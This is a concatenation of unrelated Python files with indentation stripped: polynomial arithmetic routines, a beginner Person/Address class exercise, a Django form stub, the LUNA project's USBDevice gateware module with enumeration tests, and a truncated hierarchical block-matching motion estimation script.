#print(reduc([0,1,2,3,0,5]))
#print(reduc([1]))
#print(reduc([0]))
#print(reduc([0,0,0]))
#print(reduc([0,0,0,0,0,0,0]))
def poly_add(P, Q):
n=len(P)
m=len(Q)
if m>n:
P=P+[0]*(m-n)
else:
Q=Q+[0]*(n-m)
for i in range(len(P)):
P[i]+=Q[i]
return reduc(P)
#print(poly_add([2,3],[3,4]))
def poly_scal(P, a):
for i in range(len(P)):
P[i]*=a
return reduc(P)
#print(poly_scal([2,3],3))
def poly_multi(P, Q):
n=len(P)
m=len(Q)
S=[]
if m>n:
P=P+[0]*(m-n)
else:
Q=Q+[0]*(n-m)
for k in range(n+m+1):
v=0
for i in range(len(P)):
for j in range(len(Q)):
if i+j==k:
v+=P[i]*Q[j]
S.append(v)
return reduc(S)
#print(poly_multi([1,1,1],[1,1,1]))
def eval_naif(P,a):
S=0
pw=1
for i in range(len(P)):
S+=P[i]*pw
pw*=a
return S
def Horner(P,a):
P=reduc(P)
p=len(P)-1
cnt=P[p]
for i in range(p-1, -1, -1):
cnt=P[i]+a*cnt
return cnt
#print(eval_naif([1,1,1],2))
#print(Horner([1,1,1],2))
def tchebychev(n):
t0 = [1]
t1 = [0,1]
for i in range(2, n+1):
(t1, t0) = (poly_add(poly_multi(poly_scal([0,1],2),t1), poly_scal(t0,-1)), t1)
return t1
#print(tchebychev(2))
def binomial (k, n):
num = 1
den = 1
for i in range(n-k+1,n+1):
num*= i
for i in range(1,k+1):
den*= i
return num // den
def tchebychev_sigma(n):
S=[]
C=[1]
D=[0]*(n)+[1]
for k in range(n//2+1):
S=poly_add(poly_scal(poly_multi(D, C), binomial(2*k, n)), S)
D=[0]*(n-2*k-2)+[1]
C=poly_multi(C, [-1,0,1])
return S
#print(Horner(tchebychev(3),4))
#print(Horner(tchebychev_sigma(3),4))
#print(tchebychev(2))
#print(Horner(tchebychev(100),cos(5)))
#print(cos(500))
def div_poly(A, B):
Q=[]
R=A[:]
n=degre(R)
p=degre(B)
b=B[p]
for k in range(n,p-1,-1):
a = R[k]
Q.append(a/b)
R = poly_add(R, poly_multi(poly_scal([0]*(k-p)+[1],-a/b), B))
return(Q[::-1], R)
#print(div_poly([1,1,0,1], [1,1])) => ([2, -1, 1], [-1])
def div_poly_opt(A, B):
Q=[]
R=A[:]
n=degre(R)
p=degre(B)
b=B[p]
for k in range(n,p-1,-1):
a = R[k]
Q.append(a/b)
for i in range(p+1):
c = -a/b*B[i]
R[k-p+i]+=c
return(Q[::-1], R)
#print(div_poly_opt([1,1,0,1], [1,1]))
def compose(P, Q):
P=reduc(P)
Qn = [1]
R=[0]
for i in range(len(P)):
R=poly_add(poly_scal(Qn[:], P[i]), R)
Qn = poly_multi(Qn, Q)
return R
#print(compose([0,1,1], [1,1]))
|
# You can write a class to represent anything you want.
# For example, write a class to represent an Address –each address has a country, city, street name and house number.
# Modify your Person class to use Address objects instead of string for representing the address.
class Person:
def __init__(self, n, age, gender, address):
self.__name = n
self.__age = age
self.__gender = gender
self.__addresses = []
if address is not None:
self.__addresses.append(address)
def older(self, comparison):
print("Is {}'s age ({}) older than {}'s age ({})?".format(comparison.__name, comparison.__age, self.__name, self.__age))
if self.__age < comparison.__age:
print(True)
else:
print(False)
def add_address(self, address):
self.__addresses.append(address)
def display_addresses(self):
output = ""
for i, addr in enumerate(self.__addresses):
output += "\n Address " + str(i+1) + ": " + str(addr)
return output
def split_names(self):
temp = self.__name.split()
print(f"Forename: {temp[0]}, Surname: {' '.join(temp[1:])}, Addresses: {self.display_addresses()}")
class Address:
def __init__(self, street, street2, city, county, country, postcode):
self._street = street
self._street2 = street2
self._city = city
self._county = county
self._country = country
self._postcode = postcode
self._attributes = [self._street, self._street2, self._city, self ._county, self._country, self._postcode]
def add_address(self):
for i in self._street, self._street2, self._city, self._county, self._country, self._postcode:
i = input("Enter " + i)
def __str__(self):
readout = ""
attr_list = [a for a in self._attributes if a is not None]
print(attr_list)
for i, attr in enumerate(attr_list):
if attr is not None:
readout += attr
if len(attr_list) - i > 1:
readout += ", "
return readout
a2 = Address("Church road", None, None, "County Hertfordshire", "UK", "ALT 739E")
p1 = Person('Mick Doyle Murphy', 75, 'Male', a2)
p2 = Person('Bob Vance', 80, 'Male', None)
p1.split_names()
p1.older(p2)
a1 = Address("Dunbur", None, "Rathnew", "Wicklow", "Ireland", None)
print(a1)
p1.add_address(a1)
p1.add_address(a1)
p1.add_address(a1)
p1.split_names() |
# In forms.py...
from django import forms
class ModelFormCSVFile(forms.Form):
name = forms.CharField(max_length=255)
csvfile = forms.FileField()
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
"""
Contains the organizing hardware used to add USB Device functionality
to your own designs; including the core :class:`USBDevice` class.
"""
import logging
import unittest
from luna import configure_default_logging
from amaranth import Signal, Module, Elaboratable, Const
from usb_protocol.types import DescriptorTypes
from usb_protocol.emitters import DeviceDescriptorCollection
from ...interface.ulpi import UTMITranslator
from ...interface.utmi import UTMIInterfaceMultiplexer
from ...interface.gateware_phy import GatewarePHY
from . import USBSpeed, USBPacketID
from .packet import USBTokenDetector, USBHandshakeGenerator, USBDataPacketCRC
from .packet import USBInterpacketTimer, USBDataPacketGenerator, USBHandshakeDetector
from .packet import USBDataPacketReceiver
from .reset import USBResetSequencer
from .endpoint import USBEndpointMultiplexer
from .control import USBControlEndpoint
from ...test import usb_domain_test_case
from ...test.usb2 import USBDeviceTest
class USBDevice(Elaboratable):
""" Core gateware common to all LUNA USB2 devices.
The ``USBDevice`` module contains the low-level communications hardware necessary to implement a USB device;
including hardware for maintaining device state, detecting events, reading data from the host, and generating
responses.
This class can be instantiated directly, and used to build a USB device,
or can be subclassed to create custom device types.
To configure a ``USBDevice`` from a CPU or other wishbone master, see :class:`USBDeviceController`;
which can easily be attached using its `attach` method.
Parameters
----------
bus: [UTMI interface, ULPI Interface]
The UTMI or ULPI PHY connection to be used for communications.
handle_clocking: bool, Optional
True iff we should attempt to connect up the `usb` clock domain to the PHY
automatically based on the clk signals's I/O direction. This option may not work
for non-simple connections; in which case you will need to connect the clock signal
yourself.
Attributes
----------
connect: Signal(), input
Held high to keep the current USB device connected; or held low to disconnect.
low_speed_only: Signal(), input
If high, the device will operate at low speed.
full_speed_only: Signal(), input
If high, the device will be prohibited from operating at high speed.
frame_number: Signal(11), output
The current USB frame number.
microframe_number: Signal(3), output
The current USB microframe number. Always 0 on non-HS connections.
sof_detected: Signal(), output
Pulses for one cycle each time a SOF is detected; and thus our frame number has changed.
new_frame: Signal(), output
Strobe that indicates a new frame (not microframe) is detected.
reset_detected: Signal(), output
Asserted when the USB device receives a bus reset.
# State signals.
suspended: Signal(), output
High when the device is in USB suspend. This can be (and by the spec must be) used to trigger
the device to enter lower-power states.
tx_activity_led: Signal(), output
Signal that can be used to drive an activity LED for TX.
rx_activity_led: Signal(), output
Signal that can be used to drive an activity LED for RX.
"""
def __init__(self, *, bus, handle_clocking=True):
"""
Parameters:
"""
# If this looks more like a ULPI bus than a UTMI bus, translate it.
if hasattr(bus, 'dir'):
self.utmi = UTMITranslator(ulpi=bus, handle_clocking=handle_clocking)
self.bus_busy = self.utmi.busy
self.translator = self.utmi
self.always_fs = False
self.data_clock = 60e6
# If this looks more like raw I/O connections than a UTMI bus, create a pure-gatware
# PHY to drive the raw I/O signals.
elif hasattr(bus, 'd_n'):
self.utmi = GatewarePHY(io=bus)
self.bus_busy = Const(0)
self.translator = self.utmi
self.always_fs = True
self.data_clock = 12e6
# Otherwise, use it directly.
# Note that since a true UTMI interface has separate Tx/Rx/control
# interfaces, we don't need to care about bus 'busyness'; so we'll
# set it to a const zero.
else:
self.utmi = bus
self.bus_busy = Const(0)
self.translator = None
self.always_fs = True
self.data_clock = 12e6
#
# I/O port
#
self.connect = Signal()
self.low_speed_only = Signal()
self.full_speed_only = Signal()
self.frame_number = Signal(11)
self.microframe_number = Signal(3)
self.sof_detected = Signal()
self.new_frame = Signal()
self.reset_detected = Signal()
self.speed = Signal(2)
self.suspended = Signal()
self.tx_activity_led = Signal()
self.rx_activity_led = Signal()
#
# Internals.
#
self._endpoints = []
def add_endpoint(self, endpoint):
""" Adds an endpoint interface to the device.
Parameters
----------
endpoint: Elaborateable
The endpoint interface to be added. Can be any piece of gateware with a
:class:`EndpointInterface` attribute called ``interface``.
"""
self._endpoints.append(endpoint)
def add_control_endpoint(self):
""" Adds a basic control endpoint to the device.
Does not add any request handlers. If you want standard request handlers;
:attr:`add_standard_control_endpoint` automatically adds standard request handlers.
Returns
-------
Returns the endpoint object for the control endpoint.
"""
control_endpoint = USBControlEndpoint(utmi=self.utmi)
self.add_endpoint(control_endpoint)
return control_endpoint
def add_standard_control_endpoint(self, descriptors: DeviceDescriptorCollection, **kwargs):
""" Adds a control endpoint with standard request handlers to the device.
Parameters will be passed on to StandardRequestHandler.
Return value
------------
The endpoint object created.
"""
# Create our endpoint, and add standard descriptors to it.
control_endpoint = USBControlEndpoint(utmi=self.utmi)
control_endpoint.add_standard_request_handlers(descriptors, **kwargs)
self.add_endpoint(control_endpoint)
return control_endpoint
def elaborate(self, platform):
m = Module()
# If we have a bus translator, include it in our submodules.
if self.translator:
m.submodules.translator = self.translator
#
# Internal device state.
#
# Stores the device's current address. Used to identify which packets are for us.
address = Signal(7, reset=0)
# Stores the device's current configuration. Defaults to unconfigured.
configuration = Signal(8, reset=0)
#
# Internal interconnections.
#
# Create our reset sequencer, which will be in charge of detecting USB port resets,
# detecting high-speed hosts, and communicating that we are a high speed device.
m.submodules.reset_sequencer = reset_sequencer = USBResetSequencer()
m.d.comb += [
reset_sequencer.bus_busy .eq(self.bus_busy),
reset_sequencer.vbus_connected .eq(~self.utmi.session_end),
reset_sequencer.line_state .eq(self.utmi.line_state),
]
# Create our internal packet components:
# - A token detector, which will identify and parse the tokens that start transactions.
# - A data transmitter, which will transmit provided data streams.
# - A data receiver, which will receive data from UTMI and convert it into streams.
# - A handshake generator, which will assist in generating response packets.
# - A handshake detector, which detects handshakes generated by the host.
# - A data CRC16 handler, which will compute data packet CRCs.
# - An interpacket delay timer, which will enforce interpacket delays.
m.submodules.token_detector = token_detector = \
USBTokenDetector(utmi=self.utmi, domain_clock=self.data_clock, fs_only=self.always_fs)
m.submodules.transmitter = transmitter = USBDataPacketGenerator()
m.submodules.receiver = receiver = USBDataPacketReceiver(utmi=self.utmi)
m.submodules.handshake_generator = handshake_generator = USBHandshakeGenerator()
m.submodules.handshake_detector = handshake_detector = USBHandshakeDetector(utmi=self.utmi)
m.submodules.data_crc = data_crc = USBDataPacketCRC()
m.submodules.timer = timer = \
USBInterpacketTimer(domain_clock=self.data_clock, fs_only=self.always_fs)
# Connect our transmitter/receiver to our CRC generator.
data_crc.add_interface(transmitter.crc)
data_crc.add_interface(receiver.data_crc)
# Connect our receiver to our timer.
timer.add_interface(receiver.timer)
m.d.comb += [
# Ensure our token detector only responds to tokens addressed to us.
token_detector.address .eq(address),
# Hook up our data_crc to our receive inputs.
data_crc.rx_data .eq(self.utmi.rx_data),
data_crc.rx_valid .eq(self.utmi.rx_valid),
# Connect our state signals to our subordinate components.
token_detector.speed .eq(self.speed),
timer.speed .eq(self.speed)
]
#
# Endpoint connections.
#
# Create our endpoint multiplexer...
m.submodules.endpoint_mux = endpoint_mux = USBEndpointMultiplexer()
endpoint_collection = endpoint_mux.shared
# Connect our timer and CRC interfaces.
timer.add_interface(endpoint_collection.timer)
data_crc.add_interface(endpoint_collection.data_crc)
m.d.comb += [
# Low-level hardware interface.
token_detector.interface .connect(endpoint_collection.tokenizer),
handshake_detector.detected .connect(endpoint_collection.handshakes_in),
# Device state.
endpoint_collection.speed .eq(self.speed),
endpoint_collection.active_config .eq(configuration),
endpoint_collection.active_address .eq(address),
# Receive interface.
receiver.stream .connect(endpoint_collection.rx),
endpoint_collection.rx_complete .eq(receiver.packet_complete),
endpoint_collection.rx_invalid .eq(receiver.crc_mismatch),
endpoint_collection.rx_ready_for_response .eq(receiver.ready_for_response),
endpoint_collection.rx_pid_toggle .eq(receiver.active_pid[3]),
# Transmit interface.
endpoint_collection.tx .attach(transmitter.stream),
handshake_generator.issue_ack .eq(endpoint_collection.handshakes_out.ack),
handshake_generator.issue_nak .eq(endpoint_collection.handshakes_out.nak),
handshake_generator.issue_stall .eq(endpoint_collection.handshakes_out.stall),
transmitter.data_pid .eq(endpoint_collection.tx_pid_toggle),
]
# If an endpoint wants to update our address or configuration, accept the update.
with m.If(endpoint_collection.address_changed):
m.d.usb += address.eq(endpoint_collection.new_address)
with m.If(endpoint_collection.config_changed):
m.d.usb += configuration.eq(endpoint_collection.new_config)
# Finally, add each of our endpoints to this module and our multiplexer.
for endpoint in self._endpoints:
# Create a display name for the endpoint...
name = endpoint.__class__.__name__
if hasattr(m.submodules, name):
name = f"{name}_{id(endpoint)}"
# ... and add it, both as a submodule and to our multiplexer.
endpoint_mux.add_interface(endpoint.interface)
m.submodules[name] = endpoint
#
# Transmitter multiplexing.
#
# Create a multiplexer that will arbitrate access to the transmit lines.
m.submodules.tx_multiplexer = tx_multiplexer = UTMIInterfaceMultiplexer()
# Connect each of our transmitters.
tx_multiplexer.add_input(reset_sequencer.tx)
tx_multiplexer.add_input(transmitter.tx)
tx_multiplexer.add_input(handshake_generator.tx)
m.d.comb += [
# Connect our transmit multiplexer to the actual UTMI bus.
tx_multiplexer.output .attach(self.utmi),
# Connect up the transmit CRC interface to our UTMI bus.
data_crc.tx_valid .eq(tx_multiplexer.output.valid & self.utmi.tx_ready),
data_crc.tx_data .eq(tx_multiplexer.output.data),
]
#
# Device-state management.
#
# On a bus reset, clear our address and configuration.
with m.If(reset_sequencer.bus_reset):
m.d.usb += [
address .eq(0),
configuration .eq(0),
]
# Device operating state controls.
m.d.comb += [
# Disable our host-mode pulldowns; as we're a device.
self.utmi.dm_pulldown .eq(0),
self.utmi.dp_pulldown .eq(0),
# Let our reset sequencer set our USB mode and speed.
reset_sequencer.low_speed_only .eq(self.low_speed_only & ~self.always_fs),
reset_sequencer.full_speed_only .eq(self.full_speed_only | self.always_fs),
self.utmi.op_mode .eq(reset_sequencer.operating_mode),
self.utmi.xcvr_select .eq(reset_sequencer.current_speed),
self.utmi.term_select .eq(reset_sequencer.termination_select & self.connect),
]
#
# Frame/microframe state.
#
# Handle each new SOF token as we receive them.
with m.If(token_detector.interface.new_frame):
# Update our knowledge of the current frame number.
m.d.usb += self.frame_number.eq(token_detector.interface.frame)
# Check if we're receiving a new 1ms frame -- which occurs when the new SOF's
# frame number is different from the previous one's. This will always be the case
# on full speed links; and will be the case 1/8th of the time on High Speed links.
m.d.comb += self.new_frame.eq(token_detector.interface.frame != self.frame_number)
# If this is a new frame, our microframe count should be zero.
with m.If(self.new_frame):
m.d.usb += self.microframe_number.eq(0)
# Otherwise, this SOF indicates a new _microframe_ [USB 2.0: 8.4.3.1].
with m.Else():
m.d.usb += self.microframe_number.eq(self.microframe_number + 1)
#
# Device-state outputs.
#
m.d.comb += [
self.speed .eq(reset_sequencer.current_speed),
self.suspended .eq(reset_sequencer.suspended),
self.sof_detected .eq(token_detector.interface.new_frame),
self.reset_detected .eq(reset_sequencer.bus_reset),
self.tx_activity_led .eq(tx_multiplexer.output.valid),
self.rx_activity_led .eq(self.utmi.rx_valid)
]
return m
class FullDeviceTest(USBDeviceTest):
""" :meta private: """
FRAGMENT_UNDER_TEST = USBDevice
FRAGMENT_ARGUMENTS = {'handle_clocking': False}
def traces_of_interest(self):
return (
self.utmi.tx_data,
self.utmi.tx_valid,
self.utmi.rx_data,
self.utmi.rx_valid,
)
def initialize_signals(self):
# Keep our device from resetting.
yield self.utmi.line_state.eq(0b01)
# Have our USB device connected.
yield self.dut.connect.eq(1)
# Pretend our PHY is always ready to accept data,
# so we can move forward quickly.
yield self.utmi.tx_ready.eq(1)
def provision_dut(self, dut):
self.descriptors = descriptors = DeviceDescriptorCollection()
with descriptors.DeviceDescriptor() as d:
d.idVendor = 0x16d0
d.idProduct = 0xf3b
d.iManufacturer = "LUNA"
d.iProduct = "Test Device"
d.iSerialNumber = "1234"
d.bNumConfigurations = 1
# Provide a core configuration descriptor for testing.
with descriptors.ConfigurationDescriptor() as c:
with c.InterfaceDescriptor() as i:
i.bInterfaceNumber = 0
with i.EndpointDescriptor() as e:
e.bEndpointAddress = 0x01
e.wMaxPacketSize = 512
with i.EndpointDescriptor() as e:
e.bEndpointAddress = 0x81
e.wMaxPacketSize = 512
dut.add_standard_control_endpoint(descriptors)
@usb_domain_test_case
def test_enumeration(self):
# Reference enumeration process (quirks merged from Linux, macOS, and Windows):
# - Read 8 bytes of device descriptor.
# - Read 64 bytes of device descriptor.
# - Set address.
# - Read exact device descriptor length.
# - Read device qualifier descriptor, three times.
# - Read config descriptor (without subordinates).
# - Read language descriptor.
# - Read Windows extended descriptors. [optional]
# - Read string descriptors from device descriptor (wIndex=language id).
# - Set configuration.
# - Read back configuration number and validate.
# Read 8 bytes of our device descriptor.
handshake, data = yield from self.get_descriptor(DescriptorTypes.DEVICE, length=8)
self.assertEqual(handshake, USBPacketID.ACK)
self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.DEVICE)[0:8])
# Read 64 bytes of our device descriptor, no matter its length.
handshake, data = yield from self.get_descriptor(DescriptorTypes.DEVICE, length=64)
self.assertEqual(handshake, USBPacketID.ACK)
self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.DEVICE))
# Send a nonsense request, and validate that it's stalled.
handshake, data = yield from self.control_request_in(0x80, 30, length=10)
self.assertEqual(handshake, USBPacketID.STALL)
# Send a set-address request; we'll apply an arbitrary address 0x31.
yield from self.set_address(0x31)
self.assertEqual(self.address, 0x31)
# Read our device descriptor.
handshake, data = yield from self.get_descriptor(DescriptorTypes.DEVICE, length=18)
self.assertEqual(handshake, USBPacketID.ACK)
self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.DEVICE))
# Read our device qualifier descriptor.
for _ in range(3):
handshake, data = yield from self.get_descriptor(DescriptorTypes.DEVICE_QUALIFIER, length=10)
self.assertEqual(handshake, USBPacketID.STALL)
# Read our configuration descriptor (no subordinates).
handshake, data = yield from self.get_descriptor(DescriptorTypes.CONFIGURATION, length=9)
self.assertEqual(handshake, USBPacketID.ACK)
self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.CONFIGURATION)[0:9])
# Read our configuration descriptor (with subordinates).
handshake, data = yield from self.get_descriptor(DescriptorTypes.CONFIGURATION, length=32)
self.assertEqual(handshake, USBPacketID.ACK)
self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.CONFIGURATION))
# Read our string descriptors.
for i in range(4):
handshake, data = yield from self.get_descriptor(DescriptorTypes.STRING, index=i, length=255)
self.assertEqual(handshake, USBPacketID.ACK)
self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.STRING, index=i))
# Set our configuration...
status_pid = yield from self.set_configuration(1)
self.assertEqual(status_pid, USBPacketID.DATA1)
# ... and ensure it's applied.
handshake, configuration = yield from self.get_configuration()
self.assertEqual(handshake, USBPacketID.ACK)
self.assertEqual(configuration, [1], "device did not accept configuration!")
class LongDescriptorTest(USBDeviceTest):
""" :meta private: """
FRAGMENT_UNDER_TEST = USBDevice
FRAGMENT_ARGUMENTS = {'handle_clocking': False}
def initialize_signals(self):
# Keep our device from resetting.
yield self.utmi.line_state.eq(0b01)
# Have our USB device connected.
yield self.dut.connect.eq(1)
# Pretend our PHY is always ready to accept data,
# so we can move forward quickly.
yield self.utmi.tx_ready.eq(1)
def provision_dut(self, dut):
self.descriptors = descriptors = DeviceDescriptorCollection()
with descriptors.DeviceDescriptor() as d:
d.idVendor = 0x16d0
d.idProduct = 0xf3b
d.iManufacturer = "LUNA"
d.iProduct = "Test Device"
d.iSerialNumber = "1234"
d.bNumConfigurations = 1
# Provide a core configuration descriptor for testing.
with descriptors.ConfigurationDescriptor() as c:
with c.InterfaceDescriptor() as i:
i.bInterfaceNumber = 0
for n in range(15):
with i.EndpointDescriptor() as e:
e.bEndpointAddress = n
e.wMaxPacketSize = 512
with i.EndpointDescriptor() as e:
e.bEndpointAddress = 0x80 | n
e.wMaxPacketSize = 512
dut.add_standard_control_endpoint(descriptors)
@usb_domain_test_case
def test_long_descriptor(self):
descriptor = self.descriptors.get_descriptor_bytes(DescriptorTypes.CONFIGURATION)
# Read our configuration descriptor (no subordinates).
handshake, data = yield from self.get_descriptor(DescriptorTypes.CONFIGURATION, length=len(descriptor))
self.assertEqual(handshake, USBPacketID.ACK)
self.assertEqual(bytes(data), descriptor)
self.assertEqual(len(data), len(descriptor))
@usb_domain_test_case
def test_descriptor_zlp(self):
# Try requesting a long descriptor, but using a length that is a
# multiple of the endpoint's maximum packet length. This should cause
# the device to return some number of packets with the maximum packet
# length, followed by a zero-length packet to terminate the
# transaction.
descriptor = self.descriptors.get_descriptor_bytes(DescriptorTypes.CONFIGURATION)
# Try requesting a single and three max-sized packet.
for factor in [1, 3]:
request_length = self.max_packet_size_ep0 * factor
handshake, data = yield from self.get_descriptor(DescriptorTypes.CONFIGURATION, length=request_length)
self.assertEqual(handshake, USBPacketID.ACK)
self.assertEqual(bytes(data), descriptor[0:request_length])
self.assertEqual(len(data), request_length)
#
# Section that requires our CPU framework.
# We'll very deliberately section that off, so it
#
try:
from ...soc.peripheral import Peripheral
class USBDeviceController(Peripheral, Elaboratable):
""" SoC controller for a USBDevice.
Breaks our USBDevice control and status signals out into registers so a CPU / Wishbone master
can control our USB device.
The attributes below are intended to connect to a USBDevice. Typically, they'd be created by
using the .controller() method on a USBDevice object, which will automatically connect all
relevant signals.
Attributes
----------
connect: Signal(), output
High when the USBDevice should be allowed to connect to a host.
"""
def __init__(self):
super().__init__()
#
# I/O port
#
self.connect = Signal(reset=1)
self.bus_reset = Signal()
#
# Registers.
#
regs = self.csr_bank()
self._connect = regs.csr(1, "rw", desc="""
Set this bit to '1' to allow the associated USB device to connect to a host.
""")
self._speed = regs.csr(2, "r", desc="""
Indicates the current speed of the USB device. 0 indicates High; 1 => Full,
2 => Low, and 3 => SuperSpeed (incl SuperSpeed+).
""")
self._reset_irq = self.event(mode="rise", name="reset", desc="""
Interrupt that occurs when a USB bus reset is received.
""")
# Wishbone connection.
self._bridge = self.bridge(data_width=32, granularity=8, alignment=2)
self.bus = self._bridge.bus
self.irq = self._bridge.irq
def attach(self, device: USBDevice):
""" Returns a list of statements necessary to connect this to a USB controller.
The returned values makes all of the connections necessary to provide control and fetch status
from the relevant USB device. These can be made either combinationally or synchronously, but
combinational is recommended; as these signals are typically fed from a register anyway.
Parameters
----------
device: USBDevice
The :class:`USBDevice` object to be controlled.
"""
return [
device.connect .eq(self.connect),
self.bus_reset .eq(device.reset_detected),
self._speed.r_data .eq(device.speed)
]
def elaborate(self, platform):
m = Module()
m.submodules.bridge = self._bridge
# Core connection register.
m.d.comb += self.connect.eq(self._connect.r_data)
with m.If(self._connect.w_stb):
m.d.usb += self._connect.r_data.eq(self._connect.w_data)
# Reset-detection event.
m.d.comb += self._reset_irq.stb.eq(self.bus_reset)
return m
except ImportError as e:
# Since this exception happens so early, top_level_cli won't have set up logging yet,
# so call the setup here to avoid getting stuck with Python's default config.
configure_default_logging()
logging.warning("SoC framework components could not be imported; some functionality will be unavailable.")
logging.warning(e)
if __name__ == "__main__":
unittest.main()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 23 10:59:47 2021
@author: anusk
"""
import cv2
import numpy as np
def HBMA(targetFrame, anchorFrame, blocksize,L):
anchorFrame = anchorFrame.astype('uint16')
targetFrame = targetFrame.astype('uint16')
predictFrame = np.zeros(anchorFrame.shape)
accuracy = 1
p =16
frameH, frameW = anchorFrame.shape
accuracy = 1
rangs = np.array([-32,-32])
rang6= np.array([32,32])
m=0
factor=2**(L-1)
e = 0.0000000000000000000001
#initial motion vectors
mv_x = 0
mv_y = 0
dx =[]
dy=[]
ox = []
oy=[]
error = 255*blocksize*blocksize*100
#Upownsample
upanchorframe = np.zeros([frameH*2,frameW*2], dtype = np.uint16)
upanchorframe[0:(frameH*2-1):2, 0:(frameW*2-1):2] = anchorFrame
upanchorframe[0:(frameH*2-1):2, 1:(frameW*2-2):2] = (anchorFrame[:,0:frameW-1]+anchorFrame[:,1:frameW])/2
upanchorframe[1:(frameH*2-2):2, 0:(frameW*2-1):2] = (anchorFrame[0:frameH-1, :]+anchorFrame[1:frameH, :])/2
upanchorframe[1:(frameH*2-2):2, 1:(frameW*2-2):2] = (anchorFrame[0:frameH-1,0:frameW-1]+ anchorFrame[0:frameH-1, 1:frameW]+anchorFrame[1:frameH, 0:frameW-1]+anchorFrame[1:frameH,1:frameW])/4
#Downsample
anchorDown1 = np.copy(anchorFrame)
targetDown1 = np.copy(targetFrame)
targetDown2 = np.zeros([int(frameH/2),int(frameW/2)], dtype = np.uint16)
targetDown2[0:int(frameH/2),0:int(frameW/2)] = targetFrame[0:frameH:2,0:frameW:2]
targetDown3 = np.zeros([int(frameH/4),int(frameW/4)], dtype = np.uint16)
targetDown3[0:int(frameH/4),0:int(frameW/4)] = targetDown2[0:int(frameH/2):2,0:int(frameW/2):2]
anchorDown2 = np.zeros([int(frameH/2),int(frameW/2)], dtype = np.uint16)
anchorDown2[0:int(frameH/2),0:int(frameW/2)] = anchorFrame[0:frameH:2,0:frameW:2]
anchorDown3 = np.zeros([int(frameH/4),int(frameW/4)], dtype = np.uint16)
anchorDown3[0:int(frameH/4),0:int(frameW/4)] = anchorDown2[0:int(frameH/2):2,0:int(frameW/2):2]
predictFrame = np.copy(anchorFrame)
#Search fields range for each level
rangs = rangs/(factor+e)
rang6 =rang6/(factor+e)
frameH = int(frameH/(factor+e))
frameW = int(frameW/(factor+e))
rangestart = [0,0]
rangeEnd =[0,0]
for i in range(0, frameH-blocksize+1, blocksize):
rangestart[0] = int(i + rangs[0])
rangeEnd[0] = int(i + blocksize + rang6[0]) #-1
if rangestart[0] < 0:
rangestart[0] =0
if rangeEnd[0]> frameH:
rangeEnd[0] = frameH
for j in range(0, frameW-blocksize+1, blocksize):
rangestart[1] = int(j + rangs[1])
rangeEnd[1] = int(j + blocksize + rang6[1]) #-1
if rangestart[1] < 0:
rangestart[1] =0
if rangeEnd[1]> frameW*accuracy:
rangeEnd[1] = int(frameW*accuracy)
tmpt = np.zeros(targetDown3.shape, dtype = np.int16)
tmpa = np.zeros(targetDown3.shape, dtype = np.int16)
tmpt[:,:] = targetDown3[:,:]
tmpa[:,:] = anchorDown3[:,:]
#EBMA SCRIPT
anchorBlock = np.zeros([blocksize,blocksize], np.int16)
anchorBlock = tmpa[i:i+blocksize, j:j+blocksize]
for y in range(rangestart[0], rangeEnd[0]-blocksize+1):
for x in range(rangestart[1], rangeEnd[1]-blocksize+1):
downtargetFrame = tmpt[y:y+accuracy*blocksize:accuracy, x:x+accuracy*blocksize:accuracy]
#calculate error
temp_error = np.sum(np.absolute(anchorBlock -downtargetFrame))
if temp_error < error:
error = temp_error
while len(dx)<=m:
dx.append(0)
dy.append(0)
mv_x = x/accuracy-j
mv_y = y/accuracy-i
dx[m]= mv_x
dy[m]= mv_y
ox.append(j)
oy.append(i)
m= m+1
dy = np.asarray(dy)
dx = np.asarray(dx)
for ii in range(L-1 , 0, -1):
print(ii)
dx= dx*2
dy = dy*2
frameH = frameH*2
lineW = np.floor(frameW/blocksize)
frameW = frameW*2
ttt = dy.size -1
m = 0
dxx =[]
dyy=[]
for i in range(0, frameH-blocksize+1, blocksize):
baseline = round(((i+1)/2)/blocksize) * lineW
for j in range(0, frameW-blocksize+1, blocksize):
mindx = int(np.floor(baseline+ round(((j+1)/2)/blocksize)+1))
if mindx>ttt:
mindx = ttt
rangestart[0] = np.int16(i+dy[mindx]+rangs[0])
rangeEnd[0]= np.int16(i+dy[mindx]+blocksize+rang6[0])
if rangestart[0] < 0:
rangestart[0] =0
if rangeEnd[0]> frameH:
rangeEnd[0] = frameH
rangestart[1] = np.int16(j + dx[mindx]+rangs[1])
rangeEnd[1] = np.int16(j + dx[mindx] + blocksize +rang6[1])
if rangestart[1] < 0:
rangestart[1] =0
if rangeEnd[1]> frameW*accuracy:
rangeEnd[1] = int(frameW*accuracy)
#Level 2
if ii==2:
tmpt=targetDown2[:,:]
tmpa = anchorDown2[:,:]
if ii==1:
tmpt=targetDown1[:,:]
tmpa = anchorDown1[:,:]
tmpt = np.int16(tmpt)
tmpa = np.int16(tmpa)
anchorBlock = tmpa[i:i+blocksize, j:j+blocksize]
mv_x =0
mv_y=0
error = 255*blocksize*blocksize*100
for y in range(rangestart[0], rangeEnd[0]-blocksize+1):
for x in range(rangestart[1], rangeEnd[1]-blocksize+1):
downtargetFrame = tmpt[y:y+accuracy*blocksize:accuracy, x:x+accuracy*blocksize:accuracy]
temp_error = np.sum(np.absolute(anchorBlock -downtargetFrame))
if temp_error<error:
error = temp_error
mv_x = x/accuracy-j
mv_y = y/accuracy-i
while len(dxx)<=m:
dxx.append(0)
dyy.append(0)
dxx[m]= mv_x
dyy[m]= mv_y
predictFrame[i:i+blocksize, j:j+blocksize] = downtargetFrame
if m==351 :
print(m)
if len(ox)<m:
ox[m] = i
oy[m] =j
else:
ox.append(i)
oy.append(j)
m = m+1
dx = np.asarray(dxx)
dy = np.asarray(dyy)
mv_d = [dx,dy]
mv_o = [np.array(ox), np.array(oy)]
return [np.uint8(predictFrame), mv_o, mv_d]
if __name__ == "__main__":
anchorframe = cv2.imread('foremanY69.png',0)
targetframe = cv2.imread('foremanY72.png',0)
anchorframe = anchorframe.astype('uint16')
